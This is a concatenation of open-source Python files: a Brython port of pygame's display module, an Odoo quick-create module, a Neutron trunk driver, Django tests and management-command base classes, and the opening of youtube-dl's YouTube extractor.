the closest compatable match. The returned surface will still always match
the requested resolution.
The flags argument controls which type of display you want. There are
several to choose from, and you can even combine multiple types using the
bitwise or operator, (the pipe "|" character). If you pass 0 or no flags
argument it will default to a software driven window. Here are the display
flags you will want to choose from:
pygame.FULLSCREEN
create a fullscreen display
pygame.DOUBLEBUF
recommended for HWSURFACE or OPENGL
pygame.HWSURFACE
hardware accelereated, only in FULLSCREEN
pygame.OPENGL
create an opengl renderable display
pygame.RESIZABLE
display window should be sizeable
pygame.NOFRAME
display window will have no border or controls
:Parameters:
- `resolution`: int, int
- `flags`: int
- `depth`: int
:rtype: `Surface`
'''
global _display_surface
w, h = resolution
if w <= 0 or h <= 0:
raise pygame.base.error('Cannot set 0 sized display mode')
if not SDL_WasInit(SDL_INIT_VIDEO):
init()
if flags & SDL_OPENGL:
if flags & SDL_DOUBLEBUF:
flags &= ~SDL_DOUBLEBUF
SDL_GL_SetAttribute(SDL_GL_DOUBLEBUFFER, 1)
else:
SDL_GL_SetAttribute(SDL_GL_DOUBLEBUFFER, 0)
if depth:
SDL_GL_SetAttribute(SDL_GL_DEPTH_SIZE, depth)
surf = SDL_SetVideoMode(w, h, depth, flags)
if SDL_GL_GetAttribute(SDL_GL_DOUBLEBUFFER):
surf.flags |= SDL_DOUBLEBUF
else:
if not depth:
flags |= SDL_ANYFORMAT
surf = SDL_SetVideoMode(w, h, depth, flags)
title, icontitle = SDL_WM_GetCaption()
if not title:
SDL_WM_SetCaption('pygame window', 'pygame')
SDL_PumpEvents()
if _display_surface:
_display_surface._surf = surf
else:
#_display_surface = pygame.surface.Surface(surf=surf)
_display_surface = pygame.surface.Surface(dim=(w,h))
document['pydiv'] <= _display_surface.canvas
if sys.platform != 'darwin':
if not _icon_was_set:
try:
file = pygame.pkgdata.getResource(_icon_defaultname)
iconsurf = pygame.image.load(file)
SDL_SetColorKey(iconsurf._surf, SDL_SRCCOLORKEY, 0)
set_icon(iconsurf)
except IOError:
# Not worth dying over.
pass
return _display_surface
def get_surface():
'''Get current display surface.
Returns a `Surface` object representing the current display. Will
return None if called before the display mode is set.
:rtype: `Surface`
'''
return _display_surface
def flip():
'''Update the full display surface to the screen.
This will update the contents of the entire display. If your display mode
is using the flags pygame.HWSURFACE and pygame.DOUBLEBUF, this will wait
for a vertical retrace and swap the surfaces. If you are using a different
type of display mode, it will simply update the entire contents of the
surface.
When using an pygame.OPENGL display mode this will perform a gl buffer
swap.
'''
pass
_video_init_check()
screen = SDL_GetVideoSurface()
if not screen:
raise pygame.base.error('Display mode not set')
if screen.flags & SDL_OPENGL:
SDL_GL_SwapBuffers()
else:
SDL_Flip(screen)
def _crop_rect(w, h, rect):
if rect.x >= w or rect.y >= h or \
rect.x + rect.w <= 0 or rect.y + rect.h <= 0:
return None
rect.x = max(rect.x, 0)
rect.y = max(rect.y, 0)
rect.w = min(rect.x + rect.w, w) - rect.x
rect.h = min(rect.y + rect.h, h) - rect.y
return rect
def update(*rectangle):
'''Update portions of the screen for software displays.
This function is like an optimized version of pygame.display.flip() for
software displays. It allows only a portion of the screen to updated,
instead of the entire area. If no argument is passed it updates the entire
Surface area like `flip`.
You can pass the function a single rectangle, or a sequence of rectangles.
It is more efficient to pass many rectangles at once than to call update
multiple times with single or a partial list of rectangles. If passing
a sequence of rectangles it is safe to include None values in the list,
which will be skipped.
This call cannot be used on pygame.OPENGL displays and will generate an
exception.
:Parameters:
`rectangle` : Rect or sequence of Rect
Area(s) to update
'''
# Undocumented: also allows argument tuple to represent one rect;
# e.g. update(0, 0, 10, 10) or update((0, 0), (10, 10))
_video_init_check()
screen = SDL_GetVideoSurface()
if not screen:
raise pygame.base.error('Display mode not set')
if screen.flags & SDL_OPENGL:
raise pygame.base.error('Cannot update an OPENGL display')
if not rectangle:
SDL_UpdateRect(screen, 0, 0, 0, 0)
else:
w, h = screen.w, screen.h
w, h = screen.width, screen.height
try:
rect = pygame.rect._rect_from_object(rectangle)._r
rect = _crop_rect(w, h, rect)
if rect:
SDL_UpdateRect(screen, rect.x, rect.y, rect.w, rect.h)
except TypeError:
rectangle = rectangle[0]
rects = [_crop_rect(w, h, pygame.rect._rect_from_object(r)._r) \
for r in rectangle if r]
SDL_UpdateRects(screen, rects)
def get_driver():
'''Get name of the pygame display backend.
Pygame chooses one of many available display backends when it is
initialized. This returns the internal name used for the display backend.
This can be used to provide limited information about what display
capabilities might be accelerated.
:rtype: str
'''
_video_init_check()
return SDL_VideoDriverName()
def Info():
'''Create a video display information object.
Creates a simple object containing several attributes to describe the
current graphics environment. If this is called before
`set_mode` some platforms can provide information about the default
display mode. This can also be called after setting the display mode to
verify specific display options were satisfied.
:see: `VideoInfo`
:rtype: `VideoInfo`
'''
_video_init_check()
return VideoInfo()
class VideoInfo:
'''Video display information.
:Ivariables:
`hw` : bool
True if the display is hardware accelerated.
`wm` : bool
True if windowed display modes can be used.
`video_mem` : int
The amount of video memory on the displaoy, in megabytes. 0 if
unknown.
`bitsize` : int
Number of bits used to store each pixel.
`bytesize` : int
Number of bytes used to store each pixel.
`masks` : (int, int, int, int)
RGBA component mask.
`shifts` : (int, int, int, int)
RGBA component shift amounts.
`losses` : (int, int, int, int)
Number of bits lost from a 32 bit depth for each RGBA component.
`blit_hw` : bool
True if hardware Surface blitting is accelerated
`blit_hw_CC` : bool
True if hardware Surface colorkey blitting is accelerated
`blit_hw_A` : bool
True if hardware Surface pixel alpha blitting is accelerated
`blit_sw` : bool
True if software Surface blitting is accelerated
`blit_sw_CC` : bool
True if software Surface colorkey blitting is accelerated
`blit_sw_A` : bool
True if software Surface pixel alpha blitting is acclerated
'''
def __init__(self):
#brython
#info = SDL_GetVideoInfo()
info=None
if not info:
raise pygame.base.error('Could not retrieve video info')
self.hw = info.hw_available
self.wm = info.wm_available
self.blit_hw = info.blit_hw
self.blit_hw_CC = info.blit_hw_CC
self.blit_hw_A = info.blit_hw_A
self.blit_sw = info.blit_sw
self.blit_sw_CC = info.blit_sw_CC
self.blit_sw_A = info.blit_sw_A
self.blit_fill = info.blit_fill
self.video_mem = info.video_mem
self.bitsize = info.vfmt.BitsPerPixel
self.bytesize = info.vfmt.BytesPerPixel
self.masks = (info.vfmt.Rmask, info.vfmt.Gmask,
info.vfmt.Bmask, info.vfmt.Amask)
self.shifts = (info.vfmt.Rshift, info.vfmt.Gshift,
info.vfmt.Bshift, info.vfmt.Ashift)
self.losses = (info.vfmt.Rloss, info.vfmt.Gloss,
info.vfmt.Bloss, info.vfmt.Aloss)
def __str__(self):
return ('<VideoInfo(hw = %d, wm = %d,video_mem = %d\n' + \
' blit_hw = %d, blit_hw_CC = %d, blit_hw_A = %d,\n'
' blit_sw = %d, blit_sw_CC = %d, blit_sw_A = %d,\n'
' bitsize = %d, bytesize = %d,\n'
' masks = (%d, %d, %d, %d),\n'
' shifts = (%d, %d, %d, %d),\n'
' losses = (%d, %d, %d, %d)>\n') % \
(self.hw, self.wm, self.video_mem,
self.blit_hw, self.blit_hw_CC, self.blit_hw_A,
self.blit_sw, self.blit_sw_CC, self.blit_sw_A,
self.bitsize, self.bytesize,
self.masks[0], self.masks[1], self.masks[2], self.masks[3],
self.shifts[0], self.shifts[1], self.shifts[2], self.shifts[3],
self.losses[0], self.losses[1], self.losses[2], self.losses[3])
def __repr__(self):
return str(self)
def get_wm_info():
'''Get settings from the system window manager.
:note: Currently unimplemented, returns an empty dict.
:rtype: dict
'''
_video_init_check()
return {}
def list_modes(depth=0, flags=pygame.constants.FULLSCREEN):
'''Get list of available fullscreen modes.
This function returns a list of possible dimensions for a specified color
depth. The return value will be an empty list if no display modes are
available with the given arguments. A return value of -1 means that any
requested resolution should work (this is likely the case for windowed
modes). Mode sizes are sorted from biggest to smallest.
If depth is 0, SDL will choose the current/best color depth for the
display. The flags defaults to pygame.FULLSCREEN, but you may need to add
additional flags for specific fullscreen modes.
:rtype: list of (int, int), or -1
:return: list of (width, height) pairs, or -1 if any mode is suitable.
'''
_video_init_check()
#brython
#format = SDL_PixelFormat()
#format.BitsPerPixel = depth
#brython
#if not format.BitsPerPixel:
# format.BitsPerPixel = SDL_GetVideoInfo().vfmt.BitsPerPixel
#brython
#rects = SDL_ListModes(format, flags)
if rects == -1:
return -1
return [(r.w, r.h) for r in rects]
def mode_ok(size, flags=0, depth=0):
'''Pick the best color depth for a display mode
This function uses the same arguments as pygame.display.set_mode(). It is
used to depermine if a requested display mode is available. It will return
0 if the display mode cannot be set. Otherwise it will return a pixel
depth that best matches the display asked for.
Usually the depth argument is not passed, but some platforms can support
multiple display depths. If passed it will hint to which depth is a better
match.
The most useful flags to pass will be pygame.HWSURFACE, pygame.DOUBLEBUF,
and maybe pygame.FULLSCREEN. The function will return 0 if these display
flags cannot be set.
:rtype: int
:return: depth, in bits per pixel, or 0 if the requested mode cannot be
set.
'''
_video_init_check()
if not depth:
depth = SDL_GetVideoInfo().vfmt.BitsPerPixel
return SDL_VideoModeOK(size[0], size[1], depth, flags)
def gl_set_attribute(flag, value):
'''Set special OpenGL attributes.
When calling `pygame.display.set_mode` with the OPENGL flag,
pygame automatically handles setting the OpenGL attributes like
color and doublebuffering. OpenGL offers several other attributes
you may want control over. Pass one of these attributes as the
flag, and its appropriate value.
This must be called before `pygame.display.set_mode`.
The OPENGL flags are: GL_ALPHA_SIZE, GL_DEPTH_SIZE, GL_STENCIL_SIZE,
GL_ACCUM_RED_SIZE, GL_ACCUM_GREEN_SIZE, GL_ACCUM_BLUE_SIZE,
GL_ACCUM_ALPHA_SIZE GL_MULTISAMPLEBUFFERS, GL_MULTISAMPLESAMPLES,
GL_STEREO.
:Parameters:
- `flag`: int
- `value`: int
'''
_video_init_check()
SDL_GL_SetAttribute(flag, value)
def gl_get_attribute(flag):
'''Get special OpenGL attributes.
After calling `pygame.display.set_mode` with the OPENGL flag
you will likely want to check the value of any special OpenGL
attributes you requested. You will not always get what you
requested.
See `gl_set_attribute` for a list of flags.
:Parameters:
- `flag`: int
:rtype: int
'''
_video_init_check()
return SDL_GL_GetAttribute(flag)
def get_active():
'''Get state of display mode
Returns True if the current display is active on the screen. This
done with the call to ``pygame.display.set_mode()``. It is
potentially subject to the activity of a running window manager.
Calling `set_mode` will change all existing display surface
to reference the new display mode. The old display surface will
be lost after this call.
'''
brython
return SDL_GetAppState() & SDL_APPACTIVE != 0
def iconify():
'''Iconify the display surface.
Request the window for the display surface be iconified or hidden. Not all
systems and displays support an iconified display. The function will
return True if successfull.
When the display is iconified pygame.display.get_active() will return
False. The event queue should receive a pygame.APPACTIVE event when the
window has been iconified.
:rtype: bool
:return: True on success
'''
_video_init_check()
try:
SDL_WM_IconifyWindow()
return True
except SDL_Exception:
return False
def toggle_fullscreen():
'''Switch between fullscreen and windowed displays.
Switches the display window between windowed and fullscreen modes. This
function only works under the unix x11 video driver. For most situations
it is better to call pygame.display.set_mode() with new display flags.
:rtype: bool
'''
_video_init_check()
screen = SDL_GetVideoSurface()
try:
SDL_WM_ToggleFullScreen(screen)
return True
except SDL_Exception:
return False
return False
def set_gamma(red, green=None, blue=None):
'''Change the hardware gamma ramps.
Set the red, green, and blue gamma values on the display hardware. If the
green and blue arguments are not passed, they will both be the same as
red. Not all systems and hardware support gamma ramps, if the function
succeeds it will return True.
A gamma value of 1.0 creates a linear color table. Lower values will
darken the display and higher values will brighten.
:Parameters:
`red` : float
Red gamma value
`green` : float
Green gamma value
`blue` : float
Blue gamma value
:rtype: bool
'''
brython
_video_init_check()
if not green or not blue:
green = red
blue = red
try:
SDL_SetGamma(red, green, blue)
return True
except SDL_Exception:
return False
def set_gamma_ramp(red, green, blue):
'''Change the hardware gamma ramps with a custom lookup.
Set the red, green, and blue gamma ramps with an explicit lookup table.
Each argument should be sequence of 256 integers. The integers should
range between 0 and 0xffff. Not all systems and hardware support gamma
ramps, if the function succeeds it will return True.
:Parameters:
`red` : sequence of int
Sequence of 256 ints in range [0, 0xffff] giving red component
lookup.
`green` : sequence of int
Sequence of 256 ints in range [0, 0xffff] giving green component
lookup.
`blue` : sequence of int
Sequence of 256 ints in range [0, 0xffff] giving blue component
lookup.
:rtype: bool
'''
_video_init_check()
try:
SDL_SetGammaRamp(red, green, blue)
return True
except SDL_Exception:
return False
def set_icon(surface):
'''Change the system image for the display window.
Sets the runtime icon the system will use to represent the display window.
All windows default to a simple pygame logo for the window icon.
You can pass any surface, but most systems want a smaller image around
32x32. The image can have colorkey transparency which will be passed to
the system.
Some systems do not allow the window icon to change after it has been
shown. This function can be called before `set_mode` to
create the icon before the display mode is set.
:Parameters:
`surface` : `Surface`
Surface containing image to set.
'''
global _icon_was_set
pygame.base._video_autoinit()
SDL_WM_SetIcon(surface._surf, None)
_icon_was_set = 1
def set_caption(title, icontitle=None):
'''Set the current window caption.
If the display has a window title, this function will change the name on
the window. Some systems support an alternate shorter title to be used for
minimized displays.
:Parameters:
`title` : unicode
Window caption
`icontitle` : unicode
Icon caption, if supported
'''
if not icontitle:
icontitle = title
SDL_WM_SetCaption(title, icontitle)
def get_caption():
'''Get the current window caption.
Returns the title and icontitle for the display Surface. These will often
be the same value.
:rtype: (unicode, unicode)
:return: title, icontitle
'''
# XXX deviation from pygame, don't return () if title == None
#return SDL_WM_GetCaption()
return "", ""
def set_palette(palette=None):
'''Set the display color palette for indexed displays.
This will change the video display color palette for 8bit displays. This
does not change the palette for the actual display Surface, only the
palette that is used to display the Surface. If no palette argument is
passed, the system default palette will be restored. The palette is a
sequence of RGB triplets.
:Parameters:
`palette` : sequence of (int, int, int)
Sequence having at most 256 RGB triplets.
'''
_video_init_check()
surf = SDL_GetVideoSurface()
if not surf:
raise pygame.base.error('No display mode is set')
if surf.format.BytesPerPixel != 1 or not surf.format._palette:
raise pygame.base.error('Display mode is not colormapped')
if not palette:
SDL_SetPalette(surf, SDL_PHYSPAL, surf.format.palette.colors, 0)
length = min(surf.format.palette.ncolors, len(palette))
colors = [SDL_Color(r, g, b) for r, g, b in palette[:length]]
SDL_SetPalette(surf, SDL_PHYSPAL, colors, 0)
def _video_init_check():
if not SDL_WasInit(SDL_INIT_VIDEO):
raise pygame.base.error('video system not initialized')
| gpl-3.0 |
jjscarafia/server-tools | base_optional_quick_create/model.py | 41 | 2507 | # -*- coding: utf-8 -*-
##############################################################################
#
# Copyright (C) 2013 Agile Business Group sagl (<http://www.agilebg.com>)
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published
# by the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from openerp.osv import orm, fields
from openerp import SUPERUSER_ID
from openerp.tools.translate import _
class ir_model(orm.Model):
_inherit = 'ir.model'
_columns = {
'avoid_quick_create': fields.boolean('Avoid quick create'),
}
def _wrap_name_create(self, old_create, model):
def wrapper(cr, uid, name, context=None):
raise orm.except_orm(
_('Error'),
_("Can't create quickly. Opening create form"))
return wrapper
def _register_hook(self, cr, ids=None):
if ids is None:
ids = self.search(cr, SUPERUSER_ID, [])
for model in self.browse(cr, SUPERUSER_ID, ids):
if model.avoid_quick_create:
model_name = model.model
model_obj = self.pool.get(model_name)
if model_obj and not hasattr(model_obj, 'check_quick_create'):
model_obj.name_create = self._wrap_name_create(
model_obj.name_create, model_name)
model_obj.check_quick_create = True
return True
def create(self, cr, uid, vals, context=None):
res_id = super(ir_model, self).create(cr, uid, vals, context=context)
self._register_hook(cr, [res_id])
return res_id
def write(self, cr, uid, ids, vals, context=None):
if isinstance(ids, (int, long)):
ids = [ids]
res = super(ir_model, self).write(cr, uid, ids, vals, context=context)
self._register_hook(cr, ids)
return res
| agpl-3.0 |
cloudbase/neutron | neutron/services/trunk/drivers/linuxbridge/driver.py | 4 | 1688 | #
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from oslo_config import cfg
from oslo_log import log as logging
from neutron_lib import constants
from neutron.extensions import portbindings
from neutron.services.trunk import constants as trunk_consts
from neutron.services.trunk.drivers import base
LOG = logging.getLogger(__name__)
NAME = 'linuxbridge'
SUPPORTED_INTERFACES = (
portbindings.VIF_TYPE_BRIDGE,
)
SUPPORTED_SEGMENTATION_TYPES = (
trunk_consts.VLAN,
)
class LinuxBridgeDriver(base.DriverBase):
"""Server-side Trunk driver for the ML2 Linux Bridge driver."""
@property
def is_loaded(self):
try:
return NAME in cfg.CONF.ml2.mechanism_drivers
except cfg.NoSuchOptError:
return False
@classmethod
def create(cls):
return cls(NAME, SUPPORTED_INTERFACES, SUPPORTED_SEGMENTATION_TYPES,
constants.AGENT_TYPE_LINUXBRIDGE, can_trunk_bound_port=True)
def register():
# NOTE(kevinbenton): the thing that is keeping this from being
# immediately garbage collected is that it registers callbacks
LinuxBridgeDriver.create()
LOG.debug("Linux bridge trunk driver initialized.")
| apache-2.0 |
vmarkovtsev/django | tests/invalid_models_tests/test_backend_specific.py | 191 | 1024 | # -*- encoding: utf-8 -*-
from __future__ import unicode_literals
from django.core.checks import Error
from django.db import connections, models
from django.test import mock
from .base import IsolatedModelsTestCase
def dummy_allow_migrate(db, app_label, **hints):
# Prevent checks from being run on the 'other' database, which doesn't have
# its check_field() method mocked in the test.
return db == 'default'
class BackendSpecificChecksTests(IsolatedModelsTestCase):
@mock.patch('django.db.models.fields.router.allow_migrate', new=dummy_allow_migrate)
def test_check_field(self):
""" Test if backend specific checks are performed. """
error = Error('an error', hint=None)
class Model(models.Model):
field = models.IntegerField()
field = Model._meta.get_field('field')
with mock.patch.object(connections['default'].validation, 'check_field', return_value=[error]):
errors = field.check()
self.assertEqual(errors, [error])
| bsd-3-clause |
caot/intellij-community | python/lib/Lib/site-packages/django/core/management/base.py | 248 | 16452 | """
Base classes for writing management commands (named commands which can
be executed through ``django-admin.py`` or ``manage.py``).
"""
import os
import sys
from optparse import make_option, OptionParser
import django
from django.core.exceptions import ImproperlyConfigured
from django.core.management.color import color_style
from django.utils.encoding import smart_str
class CommandError(Exception):
"""
Exception class indicating a problem while executing a management
command.
If this exception is raised during the execution of a management
command, it will be caught and turned into a nicely-printed error
message to the appropriate output stream (i.e., stderr); as a
result, raising this exception (with a sensible description of the
error) is the preferred way to indicate that something has gone
wrong in the execution of a command.
"""
pass
def handle_default_options(options):
"""
Include any default options that all commands should accept here
so that ManagementUtility can handle them before searching for
user commands.
"""
if options.settings:
os.environ['DJANGO_SETTINGS_MODULE'] = options.settings
if options.pythonpath:
sys.path.insert(0, options.pythonpath)
class BaseCommand(object):
"""
The base class from which all management commands ultimately
derive.
Use this class if you want access to all of the mechanisms which
parse the command-line arguments and work out what code to call in
response; if you don't need to change any of that behavior,
consider using one of the subclasses defined in this file.
If you are interested in overriding/customizing various aspects of
the command-parsing and -execution behavior, the normal flow works
as follows:
1. ``django-admin.py`` or ``manage.py`` loads the command class
and calls its ``run_from_argv()`` method.
2. The ``run_from_argv()`` method calls ``create_parser()`` to get
an ``OptionParser`` for the arguments, parses them, performs
any environment changes requested by options like
``pythonpath``, and then calls the ``execute()`` method,
passing the parsed arguments.
3. The ``execute()`` method attempts to carry out the command by
calling the ``handle()`` method with the parsed arguments; any
output produced by ``handle()`` will be printed to standard
output and, if the command is intended to produce a block of
SQL statements, will be wrapped in ``BEGIN`` and ``COMMIT``.
4. If ``handle()`` raised a ``CommandError``, ``execute()`` will
instead print an error message to ``stderr``.
Thus, the ``handle()`` method is typically the starting point for
subclasses; many built-in commands and command types either place
all of their logic in ``handle()``, or perform some additional
parsing work in ``handle()`` and then delegate from it to more
specialized methods as needed.
Several attributes affect behavior at various steps along the way:
``args``
A string listing the arguments accepted by the command,
suitable for use in help messages; e.g., a command which takes
a list of application names might set this to '<appname
appname ...>'.
``can_import_settings``
A boolean indicating whether the command needs to be able to
import Django settings; if ``True``, ``execute()`` will verify
that this is possible before proceeding. Default value is
``True``.
``help``
A short description of the command, which will be printed in
help messages.
``option_list``
This is the list of ``optparse`` options which will be fed
into the command's ``OptionParser`` for parsing arguments.
``output_transaction``
A boolean indicating whether the command outputs SQL
statements; if ``True``, the output will automatically be
wrapped with ``BEGIN;`` and ``COMMIT;``. Default value is
``False``.
``requires_model_validation``
A boolean; if ``True``, validation of installed models will be
performed prior to executing the command. Default value is
``True``. To validate an individual application's models
rather than all applications' models, call
``self.validate(app)`` from ``handle()``, where ``app`` is the
application's Python module.
"""
# Metadata about this command.
option_list = (
make_option('-v', '--verbosity', action='store', dest='verbosity', default='1',
type='choice', choices=['0', '1', '2', '3'],
help='Verbosity level; 0=minimal output, 1=normal output, 2=all output'),
make_option('--settings',
help='The Python path to a settings module, e.g. "myproject.settings.main". If this isn\'t provided, the DJANGO_SETTINGS_MODULE environment variable will be used.'),
make_option('--pythonpath',
help='A directory to add to the Python path, e.g. "/home/djangoprojects/myproject".'),
make_option('--traceback', action='store_true',
help='Print traceback on exception'),
)
help = ''
args = ''
# Configuration shortcuts that alter various logic.
can_import_settings = True
requires_model_validation = True
output_transaction = False # Whether to wrap the output in a "BEGIN; COMMIT;"
def __init__(self):
self.style = color_style()
def get_version(self):
"""
Return the Django version, which should be correct for all
built-in Django commands. User-supplied commands should
override this method.
"""
return django.get_version()
def usage(self, subcommand):
"""
Return a brief description of how to use this command, by
default from the attribute ``self.help``.
"""
usage = '%%prog %s [options] %s' % (subcommand, self.args)
if self.help:
return '%s\n\n%s' % (usage, self.help)
else:
return usage
def create_parser(self, prog_name, subcommand):
"""
Create and return the ``OptionParser`` which will be used to
parse the arguments to this command.
"""
return OptionParser(prog=prog_name,
usage=self.usage(subcommand),
version=self.get_version(),
option_list=self.option_list)
def print_help(self, prog_name, subcommand):
"""
Print the help message for this command, derived from
``self.usage()``.
"""
parser = self.create_parser(prog_name, subcommand)
parser.print_help()
def run_from_argv(self, argv):
"""
Set up any environment changes requested (e.g., Python path
and Django settings), then run this command.
"""
parser = self.create_parser(argv[0], argv[1])
options, args = parser.parse_args(argv[2:])
handle_default_options(options)
self.execute(*args, **options.__dict__)
def execute(self, *args, **options):
"""
Try to execute this command, performing model validation if
needed (as controlled by the attribute
``self.requires_model_validation``). If the command raises a
``CommandError``, intercept it and print it sensibly to
stderr.
"""
# Switch to English, because django-admin.py creates database content
# like permissions, and those shouldn't contain any translations.
# But only do this if we can assume we have a working settings file,
# because django.utils.translation requires settings.
if self.can_import_settings:
try:
from django.utils import translation
translation.activate('en-us')
except ImportError, e:
# If settings should be available, but aren't,
# raise the error and quit.
sys.stderr.write(smart_str(self.style.ERROR('Error: %s\n' % e)))
sys.exit(1)
try:
self.stdout = options.get('stdout', sys.stdout)
self.stderr = options.get('stderr', sys.stderr)
if self.requires_model_validation:
self.validate()
output = self.handle(*args, **options)
if output:
if self.output_transaction:
# This needs to be imported here, because it relies on
# settings.
from django.db import connections, DEFAULT_DB_ALIAS
connection = connections[options.get('database', DEFAULT_DB_ALIAS)]
if connection.ops.start_transaction_sql():
self.stdout.write(self.style.SQL_KEYWORD(connection.ops.start_transaction_sql()) + '\n')
self.stdout.write(output)
if self.output_transaction:
self.stdout.write('\n' + self.style.SQL_KEYWORD("COMMIT;") + '\n')
except CommandError, e:
self.stderr.write(smart_str(self.style.ERROR('Error: %s\n' % e)))
sys.exit(1)
def validate(self, app=None, display_num_errors=False):
"""
Validates the given app, raising CommandError for any errors.
If app is None, then this will validate all installed apps.
"""
from django.core.management.validation import get_validation_errors
try:
from cStringIO import StringIO
except ImportError:
from StringIO import StringIO
s = StringIO()
num_errors = get_validation_errors(s, app)
if num_errors:
s.seek(0)
error_text = s.read()
raise CommandError("One or more models did not validate:\n%s" % error_text)
if display_num_errors:
self.stdout.write("%s error%s found\n" % (num_errors, num_errors != 1 and 's' or ''))
def handle(self, *args, **options):
"""
The actual logic of the command. Subclasses must implement
this method.
"""
raise NotImplementedError()
class AppCommand(BaseCommand):
"""
A management command which takes one or more installed application
names as arguments, and does something with each of them.
Rather than implementing ``handle()``, subclasses must implement
``handle_app()``, which will be called once for each application.
"""
args = '<appname appname ...>'
def handle(self, *app_labels, **options):
from django.db import models
if not app_labels:
raise CommandError('Enter at least one appname.')
try:
app_list = [models.get_app(app_label) for app_label in app_labels]
except (ImproperlyConfigured, ImportError), e:
raise CommandError("%s. Are you sure your INSTALLED_APPS setting is correct?" % e)
output = []
for app in app_list:
app_output = self.handle_app(app, **options)
if app_output:
output.append(app_output)
return '\n'.join(output)
def handle_app(self, app, **options):
"""
Perform the command's actions for ``app``, which will be the
Python module corresponding to an application name given on
the command line.
"""
raise NotImplementedError()
class LabelCommand(BaseCommand):
"""
A management command which takes one or more arbitrary arguments
(labels) on the command line, and does something with each of
them.
Rather than implementing ``handle()``, subclasses must implement
``handle_label()``, which will be called once for each label.
If the arguments should be names of installed applications, use
``AppCommand`` instead.
"""
args = '<label label ...>'
label = 'label'
def handle(self, *labels, **options):
if not labels:
raise CommandError('Enter at least one %s.' % self.label)
output = []
for label in labels:
label_output = self.handle_label(label, **options)
if label_output:
output.append(label_output)
return '\n'.join(output)
def handle_label(self, label, **options):
"""
Perform the command's actions for ``label``, which will be the
string as given on the command line.
"""
raise NotImplementedError()
class NoArgsCommand(BaseCommand):
"""
A command which takes no arguments on the command line.
Rather than implementing ``handle()``, subclasses must implement
``handle_noargs()``; ``handle()`` itself is overridden to ensure
no arguments are passed to the command.
Attempting to pass arguments will raise ``CommandError``.
"""
args = ''
def handle(self, *args, **options):
if args:
raise CommandError("Command doesn't accept any arguments")
return self.handle_noargs(**options)
def handle_noargs(self, **options):
"""
Perform this command's actions.
"""
raise NotImplementedError()
def copy_helper(style, app_or_project, name, directory, other_name=''):
"""
Copies either a Django application layout template or a Django project
layout template into the specified directory.
"""
# style -- A color style object (see django.core.management.color).
# app_or_project -- The string 'app' or 'project'.
# name -- The name of the application or project.
# directory -- The directory to which the layout template should be copied.
# other_name -- When copying an application layout, this should be the name
# of the project.
import re
import shutil
other = {'project': 'app', 'app': 'project'}[app_or_project]
if not re.search(r'^[_a-zA-Z]\w*$', name): # If it's not a valid directory name.
# Provide a smart error message, depending on the error.
if not re.search(r'^[_a-zA-Z]', name):
message = 'make sure the name begins with a letter or underscore'
else:
message = 'use only numbers, letters and underscores'
raise CommandError("%r is not a valid %s name. Please %s." % (name, app_or_project, message))
top_dir = os.path.join(directory, name)
try:
os.mkdir(top_dir)
except OSError, e:
raise CommandError(e)
# Determine where the app or project templates are. Use
# django.__path__[0] because we don't know into which directory
# django has been installed.
template_dir = os.path.join(django.__path__[0], 'conf', '%s_template' % app_or_project)
for d, subdirs, files in os.walk(template_dir):
relative_dir = d[len(template_dir)+1:].replace('%s_name' % app_or_project, name)
if relative_dir:
os.mkdir(os.path.join(top_dir, relative_dir))
for subdir in subdirs[:]:
if subdir.startswith('.'):
subdirs.remove(subdir)
for f in files:
if not f.endswith('.py'):
# Ignore .pyc, .pyo, .py.class etc, as they cause various
# breakages.
continue
path_old = os.path.join(d, f)
path_new = os.path.join(top_dir, relative_dir, f.replace('%s_name' % app_or_project, name))
fp_old = open(path_old, 'r')
fp_new = open(path_new, 'w')
fp_new.write(fp_old.read().replace('{{ %s_name }}' % app_or_project, name).replace('{{ %s_name }}' % other, other_name))
fp_old.close()
fp_new.close()
try:
shutil.copymode(path_old, path_new)
_make_writeable(path_new)
except OSError:
sys.stderr.write(style.NOTICE("Notice: Couldn't set permission bits on %s. You're probably using an uncommon filesystem setup. No problem.\n" % path_new))
def _make_writeable(filename):
"""
Make sure that the file is writeable. Useful if our source is
read-only.
"""
import stat
if sys.platform.startswith('java'):
# On Jython there is no os.access()
return
if not os.access(filename, os.W_OK):
st = os.stat(filename)
new_permissions = stat.S_IMODE(st.st_mode) | stat.S_IWUSR
os.chmod(filename, new_permissions)
| apache-2.0 |
jonyroda97/redbot-amigosprovaveis | lib/youtube_dl/extractor/youtube.py | 1 | 131830 | # coding: utf-8
from __future__ import unicode_literals
import itertools
import json
import os.path
import random
import re
import time
import traceback
from .common import InfoExtractor, SearchInfoExtractor
from ..jsinterp import JSInterpreter
from ..swfinterp import SWFInterpreter
from ..compat import (
compat_chr,
compat_kwargs,
compat_parse_qs,
compat_urllib_parse_unquote,
compat_urllib_parse_unquote_plus,
compat_urllib_parse_urlencode,
compat_urllib_parse_urlparse,
compat_urlparse,
compat_str,
)
from ..utils import (
clean_html,
error_to_compat_str,
ExtractorError,
float_or_none,
get_element_by_attribute,
get_element_by_id,
int_or_none,
mimetype2ext,
orderedSet,
parse_codecs,
parse_duration,
qualities,
remove_quotes,
remove_start,
smuggle_url,
str_to_int,
try_get,
unescapeHTML,
unified_strdate,
unsmuggle_url,
uppercase_escape,
urlencode_postdata,
)
class YoutubeBaseInfoExtractor(InfoExtractor):
"""Provide base functions for Youtube extractors"""
_LOGIN_URL = 'https://accounts.google.com/ServiceLogin'
_TWOFACTOR_URL = 'https://accounts.google.com/signin/challenge'
_LOOKUP_URL = 'https://accounts.google.com/_/signin/sl/lookup'
_CHALLENGE_URL = 'https://accounts.google.com/_/signin/sl/challenge'
_TFA_URL = 'https://accounts.google.com/_/signin/challenge?hl=en&TL={0}'
_NETRC_MACHINE = 'youtube'
# If True it will raise an error if no login info is provided
_LOGIN_REQUIRED = False
